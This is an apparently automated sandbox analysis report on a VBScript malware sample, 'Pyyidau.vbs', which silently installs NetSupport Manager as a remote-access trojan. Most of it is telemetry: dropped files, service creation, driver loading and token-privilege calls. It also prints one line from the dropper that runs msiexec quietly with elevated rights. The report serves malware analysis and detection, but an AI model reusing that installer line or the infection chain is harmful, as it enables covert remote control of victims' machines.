                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                                System Summary

                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Dropped file: shell.ShellExecute "msiexec.exe", "/i """ & targetFile & """ /quiet", "", "runas", 1
                                Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                                Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                                Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
                                Source: C:\Windows\Installer\MSI264F.tmp Code function: 28_2_00B280C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,28_2_00B280C0
                                Source: C:\Windows\Installer\MSI264F.tmp Code function: 28_2_00B24420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,28_2_00B24420
                                Source: C:\Windows\Installer\MSI264F.tmp Code function: 28_2_00B2D040 ExitWindowsEx,28_2_00B2D040
                                Source: C:\Windows\Installer\MSI2BE4.tmp Code function: 30_2_00494420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,30_2_00494420
                                Source: C:\Windows\Installer\MSI2BE4.tmp Code function: 30_2_0049D040 ExitWindowsEx,30_2_0049D040
                                Source: C:\Windows\Installer\MSI3FCC.tmp Code function: 32_2_001B4420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,32_2_001B4420
                                Source: C:\Windows\Installer\MSI3FCC.tmp Code function: 32_2_001BD040 ExitWindowsEx,32_2_001BD040
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe File created: C:\Windows\system32\drivers\nskbfltr.sys
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\3b1425.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1AFB.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1B79.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1BA9.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1BC9.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1C08.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1C29.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{CBB68368-7767-4CFF-B3E5-211488346702}
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1DD0.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1DF0.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1E3F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1E6F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1E8F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1ECF.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1EEF.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1F1F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1F4F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1F7E.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1FBE.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1FDE.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI201E.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI204E.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI207D.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI209E.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI20BE.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI20DE.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI20FE.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI211F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI213F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI215F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI219F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI21BF.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI21DF.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI222E.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI23B6.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI23F5.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2435.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2465.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2485.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI24C5.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2504.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI25E0.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2610.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI264F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI291F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI294F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI29BD.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2B06.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2B65.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2B95.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2BE4.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2E95.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exe
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3FCC.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI4C31.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\3b1428.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI51A0.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI51C1.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI57BD.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI68D5.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6914.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6963.tmp
                                Source: C:\Windows\Installer\MSI3FCC.tmp File created: C:\Windows\SysWOW64\pcimsg.dll
                                Source: C:\Windows\Installer\MSI3FCC.tmp File created: C:\Windows\setupact.log
                                Source: C:\Windows\Installer\MSI3FCC.tmp File created: C:\Windows\setuperr.log
                                Source: C:\Windows\Installer\MSI3FCC.tmp File created: C:\Windows\SysWOW64\drivers\Msft_Kernel_nskbfltr_01005.Wdf
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe File created: C:\Windows\system32\client32provider.dll
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe File created: C:\Windows\system32\drivers\nskbfltr2.sys
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\loca[1].htm
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches
                                Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI1AFB.tmp
                                Source: C:\Windows\SysWOW64\cscript.exe Process token adjusted: Load Driver
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process token adjusted: Security
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: String function: 004ADCC0 appears 81 times
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: String function: 004D14E7 appears 61 times
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: String function: 004AB3F0 appears 33 times
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: String function: 00470C30 appears 322 times
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: String function: 0049F030 appears 273 times
                                Source: Pyyidau.vbsInitial sample: Strings found which are bigger than 50
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4296 -ip 4296
                                Source: WdfCoInstaller01005.dll.22.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 1351826 bytes, 5 files, at 0x44 +A "Wdf01000.inf" +A "Wdf.cat", flags 0x4, ID 18394, number 1, extra bytes 20 in head, 62 datablocks, 0x1503 compression
                                Source: api-ms-win-core-processthreads-l1-1-1.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-profile-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-string-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-utility-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-stdio-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-multibyte-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-heap-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-handle-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-filesystem-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-2-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-sysinfo-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-timezone-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-namedpipe-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processenvironment-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-memory-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-runtime-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-process-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-private-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-conio-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-interlocked-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-time-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-util-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-math-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-convert-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-locale-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-environment-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-localization-l1-2-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l2-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-string-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-rtlsupport-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-heap-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-libraryloader-l1-1-0.dll.22.drStatic PE information: No import functions for PE file found
                                Source: Pyyidau.vbs.exe, 00000003.00000002.2004495174.00000000110C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcredist_x86.exe~/ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1915140690.000000000D2A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcredist_x86.exe~/ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1824644395.0000000002A59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1836537031.0000000008360000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000000.1717740506.00000000002D4000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1973863526.00000000100C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcredist_x86.exe~/ vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000047A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Pyyidau.vbs
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000047FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Pyyidau.vbs
                                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2298
                                Source: WdfCoInstaller01005.dll.22.drStatic PE information: Section: .rsrc ZLIB complexity 0.9963142759691381
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                                Source: 3.2.Pyyidau.vbs.exe.8360000.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                                Source: classification engineClassification label: mal100.bank.troj.expl.evad.winVBS@72/246@3/3
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00AFC0F0 AdjustTokenPrivileges,CloseHandle,28_2_00AFC0F0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00AFC060 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,28_2_00AFC060
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B222C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetTokenInformation,GetTokenInformation,_malloc,GetTokenInformation,LookupPrivilegeNameW,_free,CloseHandle,28_2_00B222C0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B24420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,28_2_00B24420
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00AFEAB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,28_2_00AFEAB0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B315D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,28_2_00B315D0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0046C060 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,30_2_0046C060
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0046C0F0 AdjustTokenPrivileges,CloseHandle,30_2_0046C0F0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004922C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetTokenInformation,GetTokenInformation,_malloc,GetTokenInformation,LookupPrivilegeNameW,_free,CloseHandle,30_2_004922C0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00494420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,30_2_00494420
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0046EAB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,30_2_0046EAB0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004A15D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,30_2_004A15D0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0018C060 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,32_2_0018C060
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0018C0F0 AdjustTokenPrivileges,CloseHandle,32_2_0018C0F0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B22C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetTokenInformation,GetTokenInformation,_malloc,GetTokenInformation,LookupPrivilegeNameW,_free,CloseHandle,32_2_001B22C0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B4420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,32_2_001B4420
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0018EAB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,32_2_0018EAB0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001C15D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,32_2_001C15D0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: OpenSCManagerW,GetLastError,CloseServiceHandle,wsprintfW,CloseServiceHandle,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,ChangeServiceConfigW,CloseServiceHandle,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryW,OpenSCManagerW,FreeLibrary,GetSystemDirectoryW,OpenSCManagerW,GetLastError,FreeLibrary,CloseServiceHandle,28_2_00B2B310
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: CreateServiceW,GetLastError,StartServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,28_2_00B2F880
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: _wprintf,CreateServiceW,GetLastError,_wprintf,_wprintf,FreeLibrary,CloseServiceHandle,FreeLibrary,28_2_00AFBB90
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: CreateServiceW,GetLastError,28_2_00AE9C70
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: OpenSCManagerW,GetLastError,CloseServiceHandle,wsprintfW,CloseServiceHandle,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,ChangeServiceConfigW,CloseServiceHandle,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryW,OpenSCManagerW,FreeLibrary,GetSystemDirectoryW,OpenSCManagerW,GetLastError,FreeLibrary,CloseServiceHandle,30_2_0049B310
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: CreateServiceW,GetLastError,StartServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,30_2_0049F880
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: _wprintf,CreateServiceW,GetLastError,_wprintf,_wprintf,FreeLibrary,CloseServiceHandle,FreeLibrary,30_2_0046BB90
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: CreateServiceW,GetLastError,30_2_00459C70
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: OpenSCManagerW,GetLastError,CloseServiceHandle,wsprintfW,CloseServiceHandle,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,ChangeServiceConfigW,CloseServiceHandle,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryW,OpenSCManagerW,FreeLibrary,GetSystemDirectoryW,OpenSCManagerW,GetLastError,FreeLibrary,CloseServiceHandle,32_2_001BB310
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: _wprintf,CreateServiceW,GetLastError,_wprintf,_wprintf,FreeLibrary,CloseServiceHandle,FreeLibrary,32_2_0018BB90
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: CreateServiceW,GetLastError,StartServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,32_2_001BF880
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: CreateServiceW,GetLastError,32_2_00179C70
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00AF8380 CoInitialize,CoCreateInstance,CoUninitialize,28_2_00AF8380
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B08FB0 FindResourceW,LoadResource,LockResource,GetDC,SelectPalette,RealizePalette,CreateDIBitmap,ReleaseDC,DeleteObject,28_2_00B08FB0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B29630 OpenSCManagerW,GetLastError,GetLastError,OpenServiceW,GetLastError,QueryServiceStatus,QueryServiceStatus,_memset,GetSystemDirectoryW,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,GetLastError,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,RegisterEventSourceW,GetComputerNameW,wsprintfW,ReportEventW,DeregisterEventSource,GetLastError,CloseServiceHandle,CloseServiceHandle,Sleep,GetSystemDirectoryW,28_2_00B29630
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Pyyidau.vbs.exe
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2312:120:WilError_03
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzha1xoy.ipd.ps1
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs"
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: module=%s28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: V14.1028_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: ver=%s28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: /ec28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: /EC28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: PCD28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: NSM28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: system.ini28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: display.drv28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: boot28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: shellscr.drv28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: display.drv28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: module=%s28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: V14.1028_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: ver=%s28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: winexec.ok28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: V15.1028_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI264F.tmpCommand line argument: V14.1028_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: module=%s30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: V14.1030_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: ver=%s30_2_0049DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCommand line argument: /ec30_2_0049DDD0
